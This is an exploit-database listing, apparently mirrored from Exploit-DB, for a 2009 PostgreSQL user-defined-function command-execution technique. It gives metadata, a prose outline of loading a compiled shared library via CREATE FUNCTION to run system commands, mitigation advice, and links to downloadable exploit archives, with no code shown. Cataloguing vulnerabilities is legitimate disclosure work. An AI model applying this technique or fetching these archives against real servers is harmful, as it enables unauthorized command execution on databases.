header-logo
Suggest Exploit
vendor:
PostgreSQL
by:
Bernardo Damele A. G.
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: PostgreSQL
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2009

PostgreSQL UDF for command execution

This exploit allows attackers to execute arbitrary commands on a vulnerable PostgreSQL server. It is done by creating a user-defined function (UDF) and then calling it. The UDF is written in C and is compiled into a shared library. The shared library is then loaded into the PostgreSQL server using the CREATE FUNCTION command. Once the UDF is loaded, it can be called like any other PostgreSQL function. The UDF takes a single argument, which is the command to be executed. The output of the command is then returned to the caller.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the PostgreSQL server. This can be done by using a firewall to limit access to the server to only trusted hosts. Additionally, the PostgreSQL server should be configured to only allow connections from trusted hosts. Finally, the PostgreSQL server should be kept up to date with the latest security patches.
Source

Exploit-DB raw data:

PostgreSQL UDF for command execution

[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz

mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz)

# milw0rm.com [2009-01-25]

Navigation

Suggest Exploit

Services By CQR